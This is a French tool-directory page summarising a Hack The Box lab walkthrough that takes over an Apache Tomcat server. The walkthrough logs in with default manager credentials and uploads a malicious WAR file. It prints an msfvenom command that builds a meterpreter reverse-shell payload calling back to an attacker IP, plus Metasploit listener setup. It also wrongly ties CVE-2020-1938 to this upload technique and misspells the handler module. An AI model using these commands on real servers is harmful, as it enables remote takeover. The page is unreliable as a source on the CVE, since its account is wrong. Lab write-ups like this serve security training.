Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2020-1938-Exploitation — Guide pas à pas pour l'exploitation de CVE-2020-1938 (téléchargement arbitraire JSP vers RCE sur Apache Tomcat) en utilisant msfvenom et Metasploit dans un environnement de laboratoire Hack The Box. | Kitploit
Outils/GitHubGitHub/hopsypopsy8/cve-2020-1938-exploitation
Génération de PayloadsAnalyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionApprentissage et ÉducationLabs et Pratique
GitHubhopsypopsy8/cve-2020-1938-exploitation

CVE-2020-1938-Exploitation

Guide pas à pas pour l'exploitation de CVE-2020-1938 (téléchargement arbitraire JSP vers RCE sur Apache Tomcat) en utilisant msfvenom et Metasploit dans un environnement de laboratoire Hack The Box.

Voir le dépôt
3il y a 1 anPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

Exploitation de CVE-2020-1938

Téléchargement arbitraire de JSP dans Apache Tomcat menant à une exécution de code à distance (RCE)

Description

CVE-2020-1938 est une vulnérabilité critique qui impacte Apache Tomcat de 9.0.0.M1 à 9.0.0.30, 8.5.0 à 8.5.50 et 7.0.0 à 7.0.99 ⚠️ Cette vulnérabilité a été exploitée dans un lab Hack The Box.

🔗 Référence : Entrée NIST NVD

Reconnaissance

Identification d'un vecteur d'attaque

image
  1. Le site web dispose d'identifiants par défaut pour la fonctionnalité Server Status.

  2. Cette interface indique que la version est Apache Tomcat/7.0.88, architecture 64 bits.

  • À partir de cette interface, nous naviguons pour lister les applications, ce qui expose une fonctionnalité de téléchargement de fichiers .war.

  • En cas de téléchargement réussi, le fichier .war est exécuté à l'emplacement /directory/filename.

  • Des recherches sur la version d'Apache Tomcat ont confirmé la vulnérabilité à CVE-2020-1938

  • Exploitation

  • Génération du fichier .war

    root@kitploit:~
    msfvenom -p windows/x64/meterpreter_reverse_tcp LHOST=10.10.14.3 LPORT=3004 -f war -o exploit.war
    

    En utilisant msfvenom, un générateur de charges utiles Metasploit, nous générons notre charge utile exploit.war.

    1. -p windows/x64/meterpreter_reverse_tcp est le type de charge utile (dans notre cas, 64 bits comme identifié dans Server Status)
    2. LHOST=10.10.14.3 LPORT=3004 sont les détails de connexion inverse pour la machine de l'attaquant
    3. -f war est le type de fichier
    4. -o exploit.war est le nom du fichier de sortie

    Après la génération du fichier, ouvrez-le et trouvez le nom du fichier .jsp, par exemple gcvxdtmxvw.jsp, et conservez-le pour plus tard.

    Configuration de Metasploit

    root@kitploit:~
    msfconsole
    use exploit/multi/hanlder
    Set LHOST 10.10.14.3
    Set LPORT 3004
    

    Avec msfconsole, nous configurons un écouteur qui attend l'exécution de notre charge utile.

    Téléchargement et exécution du fichier malveillant

    image
    image

    Nous téléchargeons notre image dans la section de déploiement, après quoi nous actualisons l'écran et constatons que le fichier a bien été téléchargé. Pour terminer l'exploitation, nous devons naviguer vers le chemin ip/hacked/gcvxdtmxvw.jsp.

    image

    Cela bloque la requête, mais nous pouvons voir localement sur notre machine que nous avons une connexion inverse.

    Télécharger l’outil